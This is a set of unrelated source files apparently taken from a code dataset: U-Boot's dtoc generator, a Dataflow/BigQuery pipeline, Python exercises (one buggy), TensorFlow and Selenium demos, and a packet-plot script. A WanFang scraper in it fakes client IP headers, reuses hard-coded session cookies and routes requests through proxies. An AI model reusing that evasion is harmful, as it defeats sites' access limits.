uclass_node = {}\n for seq, uclass in enumerate(uclass_list):\n uclass_node[seq] = ('&DM_UCLASS_REF(%s)->sibling_node' %\n uclass.name)\n uclass_node[-1] = '&uclass_head'\n uclass_node[len(uclass_list)] = '&uclass_head'\n self.buf('\\n')\n self.buf('struct list_head %s = {\\n' % 
'uclass_head')\n self.buf('\\t.prev = %s,\\n' % uclass_node[len(uclass_list) - 1])\n self.buf('\\t.next = %s,\\n' % uclass_node[0])\n self.buf('};\\n')\n self.buf('\\n')\n\n for seq, uclass in enumerate(uclass_list):\n uc_drv = self._scan._uclass.get(uclass.uclass_id)\n\n priv_name = self.alloc_priv(uc_drv.priv, uc_drv.name, '')\n\n self.buf('DM_UCLASS_INST(%s) = {\\n' % uclass.name)\n if priv_name:\n self.buf('\\t.priv_\\t\\t= %s,\\n' % priv_name)\n self.buf('\\t.uc_drv\\t\\t= DM_UCLASS_DRIVER_REF(%s),\\n' % uclass.name)\n self.list_node('sibling_node', uclass_node, seq)\n self.list_head('dev_head', 'uclass_node', uc_drv.devs, None)\n self.buf('};\\n')\n self.buf('\\n')\n self.out(''.join(self.get_buf()))\n\n def read_aliases(self):\n \"\"\"Read the aliases and attach the information to self._alias\n\n Raises:\n ValueError: The alias path is not found\n \"\"\"\n alias_node = self._fdt.GetNode('/aliases')\n if not alias_node:\n return\n re_num = re.compile('(^[a-z0-9-]+[a-z]+)([0-9]+)$')\n for prop in alias_node.props.values():\n m_alias = re_num.match(prop.name)\n if not m_alias:\n raise ValueError(\"Cannot decode alias '%s'\" % prop.name)\n name, num = m_alias.groups()\n node = self._fdt.GetNode(prop.value)\n result = self._scan.add_uclass_alias(name, num, node)\n if result is None:\n raise ValueError(\"Alias '%s' path '%s' not found\" %\n (prop.name, prop.value))\n elif result is False:\n print(\"Could not find uclass for alias '%s'\" % prop.name)\n\n def generate_decl(self):\n nodes_to_output = list(self._valid_nodes)\n\n self.buf('#include <dm/device-internal.h>\\n')\n self.buf('#include <dm/uclass-internal.h>\\n')\n self.buf('\\n')\n self.buf(\n '/* driver declarations - these allow DM_DRIVER_GET() to be used */\\n')\n for node in nodes_to_output:\n self.buf('extern U_BOOT_DRIVER(%s);\\n' % node.struct_name)\n self.buf('\\n')\n\n if self._instantiate:\n self.buf(\n '/* device declarations - these allow DM_DEVICE_REF() to be used */\\n')\n for node in nodes_to_output:\n self.buf('extern DM_DEVICE_INST(%s);\\n' % node.var_name)\n self.buf('\\n')\n\n uclass_list = self._valid_uclasses\n\n self.buf(\n '/* uclass driver declarations - needed for DM_UCLASS_DRIVER_REF() */\\n')\n for uclass in uclass_list:\n self.buf('extern UCLASS_DRIVER(%s);\\n' % uclass.name)\n\n if self._instantiate:\n self.buf('\\n')\n self.buf('/* uclass declarations - needed for DM_UCLASS_REF() */\\n')\n for uclass in uclass_list:\n self.buf('extern DM_UCLASS_INST(%s);\\n' % uclass.name)\n self.out(''.join(self.get_buf()))\n\n def assign_seqs(self):\n \"\"\"Assign a sequence number to each node\"\"\"\n for node in self._valid_nodes_unsorted:\n seq = self._scan.assign_seq(node)\n if seq is not None:\n node.seq = seq\n\n def process_nodes(self, need_drivers):\n nodes_to_output = list(self._valid_nodes)\n\n # Figure out which drivers we actually use\n self._scan.mark_used(nodes_to_output)\n\n for node in nodes_to_output:\n node.dev_ref = 'DM_DEVICE_REF(%s)' % node.var_name\n driver = self._scan.get_driver(node.struct_name)\n if not driver:\n if not need_drivers:\n continue\n raise ValueError(\"Cannot parse/find driver for '%s'\" %\n node.struct_name)\n node.driver = driver\n uclass = self._scan._uclass.get(driver.uclass_id)\n if not uclass:\n raise ValueError(\"Cannot parse/find uclass '%s' for driver '%s'\" %\n (driver.uclass_id, node.struct_name))\n node.uclass = uclass\n node.uclass_seq = len(node.uclass.devs)\n node.uclass.devs.append(node)\n uclass.node_refs[node.uclass_seq] = \\\n '&%s->uclass_node' % node.dev_ref\n\n parent_driver = None\n if node.parent 
in self._valid_nodes:\n parent_driver = self._scan.get_driver(node.parent.struct_name)\n if not parent_driver:\n if not need_drivers:\n continue\n raise ValueError(\n \"Cannot parse/find parent driver '%s' for '%s'\" %\n (node.parent.struct_name, node.struct_name))\n node.parent_seq = len(node.parent.child_devs)\n node.parent.child_devs.append(node)\n node.parent.child_refs[node.parent_seq] = \\\n '&%s->sibling_node' % node.dev_ref\n node.parent_driver = parent_driver\n\n for node in nodes_to_output:\n ref = '&%s->child_head' % node.dev_ref\n node.child_refs[-1] = ref\n node.child_refs[len(node.child_devs)] = ref\n\n uclass_set = set()\n for driver in self._scan._drivers.values():\n if driver.used and driver.uclass:\n uclass_set.add(driver.uclass)\n self._valid_uclasses = sorted(list(uclass_set),\n key=lambda uc: uc.uclass_id)\n\n for uclass in uclass_set:\n ref = '&DM_UCLASS_REF(%s)->dev_head' % uclass.name\n uclass.node_refs[-1] = ref\n uclass.node_refs[len(uclass.devs)] = ref\n\n def output_node_plat(self, node):\n \"\"\"Output the C code for a node\n\n Args:\n node (fdt.Node): node to output\n \"\"\"\n driver = node.driver\n parent_driver = node.parent_driver\n\n line1 = 'Node %s index %d' % (node.path, node.idx)\n if driver:\n self.buf('/*\\n')\n self.buf(' * %s\\n' % line1)\n self.buf(' * driver %s parent %s\\n' % (driver.name,\n parent_driver.name if parent_driver else 'None'))\n self.buf(' */\\n')\n else:\n self.buf('/* %s */\\n' % line1)\n\n self._output_values(node)\n self._declare_device(node)\n\n self.out(''.join(self.get_buf()))\n\n def output_node_instance(self, node):\n \"\"\"Output the C code for a node\n\n Args:\n node (fdt.Node): node to output\n \"\"\"\n parent_driver = node.parent_driver\n\n self.buf('/*\\n')\n self.buf(' * Node %s index %d\\n' % (node.path, node.idx))\n self.buf(' * driver %s parent %s\\n' % (node.driver.name,\n parent_driver.name if parent_driver else 'None'))\n self.buf(' */\\n')\n\n if not node.driver.plat:\n self._output_values(node)\n self._declare_device_inst(node, parent_driver)\n\n self.out(''.join(self.get_buf()))\n\n def generate_plat(self):\n \"\"\"Generate device definitions for the platform data\n\n This writes out C platform data initialisation data and\n U_BOOT_DRVINFO() declarations for each valid node.
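A typical fragment of the generated file looks like the following\n (an illustrative sketch only - the driver, node and member names are\n assumed, not taken from a real build):\n\n static struct dtd_sandbox_spl_test dtv_spl_test = {\n .intval = 0x1,\n };\n U_BOOT_DRVINFO(spl_test) = {\n .name = \"sandbox_spl_test\",\n .plat = &dtv_spl_test,\n .plat_size = sizeof(dtv_spl_test),\n .parent_idx = -1,\n };\n\n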
Where a node has\n multiple compatible strings, a #define is used to make them equivalent.\n\n See the documentation in doc/driver-model/of-plat.rst for more\n information.\n \"\"\"\n self.out('/* Allow use of U_BOOT_DRVINFO() in this file */\\n')\n self.out('#define DT_PLAT_C\\n')\n self.out('\\n')\n self.out('#include <common.h>\\n')\n self.out('#include <dm.h>\\n')\n self.out('#include <dt-structs.h>\\n')\n self.out('\\n')\n\n if self._valid_nodes:\n self.out('/*\\n')\n self.out(\n \" * driver_info declarations, ordered by 'struct driver_info' linker_list idx:\\n\")\n self.out(' *\\n')\n self.out(' * idx %-20s %-s\\n' % ('driver_info', 'driver'))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n for node in self._valid_nodes:\n self.out(' * %3d: %-20s %-s\\n' %\n (node.idx, node.var_name, node.struct_name))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n self.out(' */\\n')\n self.out('\\n')\n\n for node in self._valid_nodes:\n self.output_node_plat(node)\n\n self.out(''.join(self.get_buf()))\n\n def generate_device(self):\n \"\"\"Generate device instances\n\n This writes out DM_DEVICE_INST() records for each device in the\n build.\n\n See the documentation in doc/driver-model/of-plat.rst for more\n information.\n \"\"\"\n self.out('#include <common.h>\\n')\n self.out('#include <dm.h>\\n')\n self.out('#include <dt-structs.h>\\n')\n self.out('\\n')\n\n if self._valid_nodes:\n self.out('/*\\n')\n self.out(\n \" * udevice declarations, ordered by 'struct udevice' linker_list position:\\n\")\n self.out(' *\\n')\n self.out(' * idx %-20s %-s\\n' % ('udevice', 'driver'))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n for node in self._valid_nodes:\n self.out(' * %3d: %-20s %-s\\n' %\n (node.idx, node.var_name, node.struct_name))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n self.out(' */\\n')\n self.out('\\n')\n\n for node in self._valid_nodes:\n self.output_node_instance(node)\n\n self.out(''.join(self.get_buf()))\n\n\n# Types of output file we understand\n# key: Command used to generate this file\n# value: OutputFile for this command\nOUTPUT_FILES_COMMON = {\n 'decl':\n OutputFile(Ftype.HEADER, 'dt-decl.h', DtbPlatdata.generate_decl,\n 'Declares externs for all device/uclass instances'),\n 'struct':\n OutputFile(Ftype.HEADER, 'dt-structs-gen.h',\n DtbPlatdata.generate_structs,\n 'Defines the structs used to hold devicetree data'),\n }\n\n# File generated without instantiate\nOUTPUT_FILES_NOINST = {\n 'platdata':\n OutputFile(Ftype.SOURCE, 'dt-plat.c', DtbPlatdata.generate_plat,\n 'Declares the U_BOOT_DRIVER() records and platform data'),\n }\n\n# File generated with instantiate\nOUTPUT_FILES_INST = {\n 'device':\n OutputFile(Ftype.SOURCE, 'dt-device.c', DtbPlatdata.generate_device,\n 'Declares the DM_DEVICE_INST() records'),\n 'uclass':\n OutputFile(Ftype.SOURCE, 'dt-uclass.c', DtbPlatdata.generate_uclasses,\n 'Declares the uclass instances (struct uclass)'),\n }\n\n\ndef run_steps(args, dtb_file, include_disabled, output, output_dirs, phase,\n instantiate, warning_disabled=False, drivers_additional=None,\n basedir=None, scan=None):\n \"\"\"Run all the steps of the dtoc tool\n\n Args:\n args (list): List of non-option arguments provided to the program\n dtb_file (str): Filename of dtb file to process\n include_disabled (bool): True to include disabled nodes\n output (str): Name of output file (None for stdout)\n output_dirs (tuple of str):\n Directory to put C output files\n Directory to put H output files\n phase: The phase of U-Boot that we are generating data for, e.g. 'spl'\n or 'tpl'.
None if not known\n instantiate: Instantiate devices so they don't need to be bound at\n run-time\n warning_disabled (bool): True to avoid showing warnings about missing\n drivers\n drivers_additional (list): List of additional drivers to use during\n scanning\n basedir (str): Base directory of U-Boot source code. Defaults to the\n grandparent of this file's directory\n scan (src_scan.Scanner): Scanner from a previous run. This can help speed\n up tests. Use None for normal operation\n\n Returns:\n DtbPlatdata object\n\n Raises:\n ValueError: if args has no command, or an unknown command\n \"\"\"\n if not args:\n raise ValueError('Please specify a command: struct, platdata, all')\n if output and output_dirs and any(output_dirs):\n raise ValueError('Must specify either output or output_dirs, not both')\n\n if not scan:\n scan = src_scan.Scanner(basedir, drivers_additional, phase)\n scan.scan_drivers()\n do_process = True\n else:\n do_process = False\n plat = DtbPlatdata(scan, dtb_file, include_disabled, instantiate)\n plat.scan_dtb()\n plat.scan_tree(add_root=instantiate)\n plat.prepare_nodes()\n plat.scan_reg_sizes()\n plat.setup_output_dirs(output_dirs)\n plat.scan_structs()\n plat.scan_phandles()\n plat.process_nodes(instantiate)\n plat.read_aliases()\n plat.assign_seqs()\n\n # Figure out what output files we plan to generate\n output_files = dict(OUTPUT_FILES_COMMON)\n if instantiate:\n output_files.update(OUTPUT_FILES_INST)\n else:\n output_files.update(OUTPUT_FILES_NOINST)\n\n cmds = args[0].split(',')\n if 'all' in cmds:\n cmds = sorted(output_files.keys())\n for cmd in cmds:\n outfile = output_files.get(cmd)\n if not outfile:\n raise ValueError(\"Unknown command '%s': (use: %s)\" %\n (cmd, ', '.join(sorted(output_files.keys()))))\n plat.setup_output(outfile.ftype,\n outfile.fname if output_dirs else output)\n plat.out_header(outfile)\n outfile.method(plat)\n plat.finish_output()\n\n if not warning_disabled:\n scan.show_warnings()\n return plat\n","repo_name":"u-boot/u-boot","sub_path":"tools/dtoc/dtb_platdata.py","file_name":"dtb_platdata.py","file_ext":"py","file_size_in_byte":46969,"program_lang":"python","lang":"en","doc_type":"code","stars":3245,"dataset":"github-code","pt":"48"}
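# A hedged sketch of how run_steps() above is typically driven from the dtoc
# command line (the option names and paths here are assumed; check
# tools/dtoc/main.py for the real CLI):
#
#     ./tools/dtoc/dtoc -d spl/u-boot-spl.dtb -o out/dt-plat.c platdata
#     ./tools/dtoc/dtoc -d spl/u-boot-spl.dtb -o out/dt-structs-gen.h struct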
k_v[0], 'names': list(k_v[1]) if k_v[1] else []\n # })\n )\n\ndef run(argv=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n default='aju-vtests2:mail_archives.ingestion_test',\n help=(\n 'Input BigQuery table to process specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output1',\n required=True,\n help=(\n 'Output BigQuery table for results specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output2',\n required=True,\n help=(\n 'Output BigQuery table for results specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n\n parser.add_argument(\n '--gcs_location',\n required=False,\n help=('GCS Location to store files to load '\n 'data into Bigquery'))\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n table_schema1 = bigquery.TableSchema()\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'from_name'\n field_schema.type = 'string'\n field_schema.mode = 'required'\n table_schema1.fields.append(field_schema)\n # repeated field\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'emails'\n field_schema.type = 'string'\n field_schema.mode = 'repeated'\n table_schema1.fields.append(field_schema)\n\n table_schema2 = bigquery.TableSchema()\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'from_email'\n field_schema.type = 'string'\n field_schema.mode = 'required'\n table_schema2.fields.append(field_schema)\n # repeated field\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'names'\n field_schema.type = 'string'\n field_schema.mode = 'repeated'\n table_schema2.fields.append(field_schema)\n\n with beam.Pipeline(argv=pipeline_args) as p:\n\n # Read the table rows into a PCollection.\n rows = p | 'read' >> beam.io.ReadFromBigQuery(table=known_args.input)\n emails_per_name = get_emails(rows)\n names_per_email = get_names(rows)\n\n # Write the output using a \"Write\" transform that has side effects.\n # pylint: disable=expression-not-assigned\n emails_per_name | 'Write1' >> beam.io.WriteToBigQuery(\n known_args.output1,\n # schema='from_name:STRING, emails:STRING',\n schema = table_schema1,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)\n\n names_per_email | 'Write2' >> beam.io.WriteToBigQuery(\n known_args.output2,\n schema = table_schema2,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)\n\n # Run the pipeline (all operations are deferred until run() is called).\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n\n# example invocation. If output tables of the same name already exist, they will be dropped\n# and overwritten. 
You can use the 'DirectRunner' also, if you set\n# GOOGLE_APPLICATION_CREDENTIALS locally.\n# python names_emails.py \\\n# --region $REGION \\\n# --input '[PROJECT ID]:mail_archives.names_emails' \\\n# --output1 '[PROJECT ID]:mail_archives.emails_name_test2' \\\n# --output2 '[PROJECT ID]:mail_archives.names_email_test2' \\\n# --runner DataflowRunner \\\n# --project $PROJECT \\\n# --temp_location gs://$BUCKET/tmp/\n","repo_name":"google/project-OCEAN","sub_path":"archive/mailing-list-data-pipelines/2-transform-data/manual_bq_ingest/dataflow/dataflow_names_emails.py","file_name":"dataflow_names_emails.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"71739798866","text":"lista = []\r\nsomapar = []\r\nsomaimpar = []\r\ncontador = 0\r\n\r\nfor contador in range(6):\r\n numeros= int(input(f\"Adicione o {contador + 1}º número inteiro e positivo: \"))\r\n if numeros == 0:\r\n print(\"não digite 0\")\r\n else:\r\n while numero !=0:\r\n contador = contador + 1\r\n lista.append(numeros)\r\n if numeros %2 == 0:\r\n somapar.append(numeros)\r\n else:\r\n somaimpar.append(numeros)\r\n\r\nprint(f\"A lista original\\n{lista}\")\r\nprint(f\"A lista dos pares: {somapar}\\nsoma dos pares: {sum(somapar)}\")\r\nprint(f\"A lista dos impares: {somaimpar}\\nsoma dos impares: {sum(somaimpar)}\")\r\n\r\n#Precisa validar a condição de ser positivo!","repo_name":"allansmar/Estudos-Python","sub_path":"listas_desafio3.py","file_name":"listas_desafio3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41040419184","text":"# -*- coding=utf-8 -*-\nfrom time import sleep\n\nimport re\nimport requests\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom ..items import ZhiWangItem, _DBConf\nfrom scrapy.exceptions import CloseSpider\nfrom bs4 import BeautifulSoup\nfrom .commonFn import initSpider,getProxy,randomIP\nimport json\nfrom redis import Redis\nimport threading\n\nthreadCount = 0\nisGoon = True\nmyLock = threading.RLock()\n\n\nclass CourseSpider(Spider):\n name = \"WanFang\"\n allowed_domains = [\"shuxiavip.com\"]\n start_urls = [\n 'http://www.shuxiavip.com/course.html'\n ]\n # 每次开始执行抓取,都将之前的数据清空\n i = 0\n\n def __init__(self, storeConf=json.dumps(_DBConf), limit_count=0, trash_data=False, *a, **kw):\n # 获取数据库配置\n super().__init__(*a, **kw)\n self.collection = initSpider(self,trash_data=trash_data,limit_count=limit_count,storeConf=storeConf)\n self.limit_count = limit_count\n self.r = Redis(db=1)\n self.cookie = {\n 'cookie': \"SERVERID=958b97eacbe3c49360ace2dfc0bd31b4|1507717368|1507713772\",\n }\n self.headers = {\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n 'accept-encoding': \"gzip, deflate\",\n 'accept-language': \"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4\",\n 'cache-control': \"no-cache\",\n 'connection': \"keep-alive\",\n 'cookie': \"Hm_lvt_f5e6bd27352a71a202024e821056162b=1507729920; Hm_lpvt_f5e6bd27352a71a202024e821056162b=1507729989; WFKS.Auth=%7b%22Context%22%3a%7b%22AccountIds%22%3a%5b%5d%2c%22Data%22%3a%5b%5d%2c%22SessionId%22%3a%228e180150-d977-47e5-8435-96e76595ec9e%22%2c%22Sign%22%3a%22hi+authserv%22%7d%2c%22LastUpdate%22%3a%222017-10-11T13%3a59%3a36Z%22%2c%22TicketSign%22%3a%22uH%2bEBqcg0n1NXO48V9NQPg%3d%3d%22%7d\",\n 'host': \"s.wanfangdata.com.cn\",\n 'upgrade-insecure-requests': \"1\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel 
Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n }\n self.DetailHeaders = {\n \"X-Forwarded-For\":randomIP(),\n \"X-Real-IP\":randomIP()\n }\n\n\n def requestsUrl(self,num):\n url = \"http://s.wanfangdata.com.cn/Paper.aspx\"\n global threadCount,isGoon\n myLock.acquire()\n print(u\"Start Requests:\"+str(num))\n querystring = {\"q\":\"成人教育\",\"f\":\"top\",\"p\":str(num)}\n myLock.release()\n try:\n response = requests.request(\"GET\", url, headers=self.headers, params=querystring,timeout=20)\n if response.status_code == 200:\n html = BeautifulSoup(response.content,'lxml')\n recordItems = html.find_all(\"div\",{\"class\":\"record-item\"})\n if len(recordItems) > 0:\n # Use a single fixed proxy for all detail pages of one list page,\n # to avoid flooding the proxy service with requests\n proxies = getProxy()\n # Proxy obtained successfully\n print(proxies[\"http\"])\n for item in recordItems:\n # Parse the data and request the detail page\n try:\n res = requests.request(\"GET\",item.find(\"a\",{\"class\":\"title\"}).get(\"href\"),headers=self.DetailHeaders,timeout=40,proxies=proxies)\n if res.status_code == 200:\n Dhtml = BeautifulSoup(res.text,'lxml')\n baseInfo = Dhtml.find(\"div\",{\"class\":\"section-baseinfo\"})\n ScItem = ZhiWangItem()\n ScItem[\"sourceType\"] = \"万方\"\n ScItem[\"college\"] = \"WanFang\"\n ScItem[\"hotValue\"] = 0\n ScItem[\"downloadNum\"] = 0\n if baseInfo:\n ScItem[\"title\"] = baseInfo.find(\"h1\").text\n ScItem[\"html\"] = baseInfo.find(\"div\",{\"class\":\"text\"}).text\n ScItem[\"url\"] = res.url\n else:\n continue\n filedInfo = Dhtml.find(\"div\",{\"class\":\"fixed-width baseinfo-feild\"})\n if filedInfo:\n tagsA = filedInfo.find(\"div\",{\"class\":\"row row-keyword\"})\n if tagsA:\n tagsA = tagsA.find_all(\"a\")\n else:\n tagsA = []\n tempTag = []\n for tag in tagsA:\n tempTag.append(tag.text)\n ScItem[\"tags\"] = tempTag\n ScItem[\"cateTag\"] = \"\"\n else:\n continue\n # Fetch finished; store the item\n self.saveToMongodb(ScItem)\n else:\n # Detail request failed; skip this item\n print(\"Detail Info Requests Failed:\")\n continue\n except Exception as e:\n print(\"Process Detail Info Error: \" + str(e))\n continue\n # All detail requests for this page are done\n print(u\"Detail Info Requests Complete!! 
ThreadCount --\")\n threadCount = threadCount - 1\n else:\n #获取列表失败了\n print(\"List Count empty\")\n threadCount = threadCount - 1\n else:\n #请求失败的考虑重新加入到队列中\n print(u\"Requests Field\")\n print(response.text)\n print(response.status_code)\n threadCount = threadCount - 1\n except Exception as e:\n print(str(e))\n threadCount = threadCount - 1\n print(u\"Requests Error\")\n\n def parse(self,response):\n global threadCount,isGoon\n num = 1107\n while(isGoon):\n if num > 6292:\n isGoon = False\n else:\n if threadCount < 4:\n t = threading.Thread(target=self.requestsUrl, name = \"Name: \"+str(num),args=(num,))\n threadCount += 1\n num += 1\n t.start()\n\n def filterStr(self,str):\n r = u'[0-9!\"#$%&\\'();\\ ()*+-/:;<=>?@,\\\\ \\\\ \\\\r\\\\t\\\\n\\\\:。?★、…【】《》?“”‘’![\\\\]^_`{|}~]+'\n return re.sub(r, '', str)\n\n def saveToMongodb(self,item):\n from bson import ObjectId\n item[\"_id\"] = ObjectId()\n item[\"html\"] = self.filterStr(item[\"html\"])\n item[\"title\"] = self.filterStr(item[\"title\"])\n self.collection.insert(item)","repo_name":"pxz000git/Spider","sub_path":"shouScrapyZH/shouSpiders/spiders/WanFang.py","file_name":"WanFang.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71286310227","text":"import tensorflow as tf\nimport numpy as np\n\nx = np.random.random([100])\ny = 0.3 * x + 0.1\n\n\nW = tf.Variable(tf.zeros([1]), dtype=tf.float32)\nb = tf.Variable(tf.zeros([1]),dtype=tf.float32)\nInput_x = tf.placeholder(tf.float32)\nInput_y = tf.placeholder(tf.float32)\n\ny_pred = W * Input_x + b\n\nloss = tf.reduce_mean(tf.square(Input_y - y_pred))\noptimizer = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(500):\n sess.run(optimizer, feed_dict={Input_x:x, Input_y:y})\n #这儿的一定要注意,因为loss不仅仅是一个变量,它是由Input_x和Input_y计算出来的,所以在���算loss的时候也需要将具体的数据传入进去\n print('epoch:', epoch, 'loss:', sess.run(loss, feed_dict={Input_x:x, Input_y:y}), 'W', sess.run(W), 'b', sess.run(b))\n","repo_name":"DecstionBack/tensorflow-exercise","sub_path":"linear_simple.py","file_name":"linear_simple.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74847597904","text":"import csv\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nimport re\n\n\n# Функция для группировки файлов по числам в названиях\ndef group_files_by_number(data):\n file_groups = defaultdict(lambda: {\"not_black_hole\": [], \"black_hole\": []})\n\n for row in data:\n file_name, sender_receiver_id, packet_count = row\n number = int(re.search(r'\\d+', file_name).group())\n\n if \"not_black_hole\" in file_name:\n file_groups[number][\"not_black_hole\"].append((sender_receiver_id, int(packet_count)))\n elif \"black_hole\" in file_name:\n file_groups[number][\"black_hole\"].append((sender_receiver_id, int(packet_count)))\n\n return file_groups\n\n\n# Чтение данных из CSV-файла\nfilename = \"results.csv\"\nwith open(filename, newline='', encoding=\"utf-8\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\", quotechar='\"')\n data = [row for row in reader]\n\nfile_groups = group_files_by_number(data)\n\n# Построение и отображение объединенных графиков с двумя столбцами разных цветов\nfor number, file_group in file_groups.items():\n fig, ax = plt.subplots(figsize=(16, 10))\n width = 0.4\n offset = width\n\n 
all_sender_receiver_ids = set()\n for j, (file_type, file_data) in enumerate(file_group.items()):\n if file_data:\n sender_receiver_ids, packet_counts = zip(*file_data)\n all_sender_receiver_ids.update(sender_receiver_ids)\n all_sender_receiver_ids = sorted(list(all_sender_receiver_ids))\n\n for j, (file_type, file_data) in enumerate(file_group.items()):\n if file_data:\n sender_receiver_ids, packet_counts = zip(*file_data)\n d = {}\n for k in range(len(sender_receiver_ids)):\n d[sender_receiver_ids[k]] = packet_counts[k]\n for s in all_sender_receiver_ids:\n if s not in d.keys():\n d[s] = 0\n pc = [d[s] for s in all_sender_receiver_ids]\n x = [i + (j * offset) for i in range(len(all_sender_receiver_ids))]\n #print(f\"{sender_receiver_ids} - {packet_counts}\")\n ax.bar(x, pc, width=width, alpha=0.6, label=file_type.capitalize())\n\n\n ax.set_title(f'Сравнение файлов not_black_hole-{number}-0.pcap и black_hole-{number}-0.pcap', fontsize=12)\n ax.set_xlabel(\"IР отправителя и получателя\", fontsize=10)\n ax.set_ylabel(\"Количество пакетов\", fontsize=10)\n ax.set_xticks([i + width / 2 for i in range(len(all_sender_receiver_ids))])\n ax.set_xticklabels(all_sender_receiver_ids, rotation=10, fontsize=8)\n ax.tick_params(axis='y', labelsize=8)\n ax.legend()\n\n plt.show()\n\n","repo_name":"LMN993/AnomaliesIdentifying","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"39605043324","text":"time = []\njogador = {}\ngols = []\nwhile True:\n jogador.clear()\n jogador['nome'] = str(input('Nome jogador: '))\n partidas = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n gols.clear()\n for contador in range(0, partidas):\n gols.append(int(input(f'Quantos gols na partida {contador+1}? ')))\n jogador['gols'] = gols[:]\n jogador['total'] = sum(gols)\n time.append(jogador.copy())\n while True:\n opcao = str(input('Deseja continuar ? [S/N] ')).upper().strip()[0]\n if opcao in 'SN':\n break\n print('ERRO ! Digite apenas S ou N.')\n if opcao in 'N':\n break\nprint('=-'*20)\nprint('ID ', end='')\nfor i in jogador.keys():\n print(f'{i:<15} ', end='')\nprint()\nprint('=-'*20)\nfor keys, valores in enumerate(time):\n print(f'{keys:>3} ', end='')\n for dados in valores.values():\n print(f'{str(dados):<15}', end='')\n print()\nprint('=-'*20)\nwhile True:\n busca = int(input('Buscar jogador pela ID? 
[999 finaliza] '))\n if busca == 999:\n break\n if busca >= len(time):\n print(f'Não existe jogador com ID {busca}')\n else:\n print(f' --- LEVANTAMENTO DO JOGADOR {time[busca][\"nome\"]} ---')\n for indice, gol in enumerate(time[busca][\"gols\"]):\n print(f' No jogo {indice+1} fez {gol} gols.')\n print('=-' * 20)\nprint('Programa finalizado')","repo_name":"takamuio/DesafiosAulaYoutube","sub_path":"venv/teste95.py","file_name":"teste95.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2463306789","text":"from os import chdir, listdir\n\nfrom os.path import isfile\n\ncaminho = \"\"\n\nchdir(caminho)\n\nlista = []\n\nfor arquivo in listdir():\n if isfile(arquivo):\n with open(arquivo, \"r\") as content:\n linha = content.readlines()\n # Skip empty files; otherwise keep the last line\n if linha:\n lista.append(linha[-1])\n\nwith open(\"c:/users/ricardo/download/juntaultimaslinhas/novo.txt\", \"w\") as f:\n for linha in lista:\n f.write(linha.rstrip(\"\\n\") + \"\\n\") ","repo_name":"rick21arce/Python","sub_path":"read_many_csvs_last_line.py","file_name":"read_many_csvs_last_line.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"5508768704","text":"from datetime import datetime\nimport time\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nfrom TestData.HomePageData import HomePageData\nfrom utilities.BaseClass import BaseClass\nfrom PageObjects.HomePage import HomePage\n\n\nclass TestE2Eone(BaseClass):\n\n\n def test_formsubmission(self, getData,setup):\n log = self.getLogger()\n\n homepage = HomePage(self.driver)\n log.info(\"Opened the URL\")\n homepage.entername().send_keys(getData[\"name\"])\n log.info(\"Entered name: \"+ getData[\"name\"])\n homepage.entermail().send_keys(getData[\"mail\"])\n log.info(\"Entered mail: \"+ getData[\"mail\"])\n homepage.enterpasswd().send_keys(getData[\"password\"])\n log.info(\"Entered Password: \"+ getData[\"password\"])\n homepage.selchkbox().click()\n log.info(\"Selected the Checkbox\")\n self.selOptionByTxt(homepage.selddoption(), getData[\"gender\"])\n log.info(\"Selected the gender as \"+ getData[\"gender\"])\n homepage.selsubmitbtn().click()\n log.info(\"Submitted the form\")\n homepage.getalertmsg(\"Success\")\n self.driver.refresh()\n\n def test_e2e(self, setup):\n log = self.getLogger()\n self.driver.implicitly_wait(10)\n\n homepage = 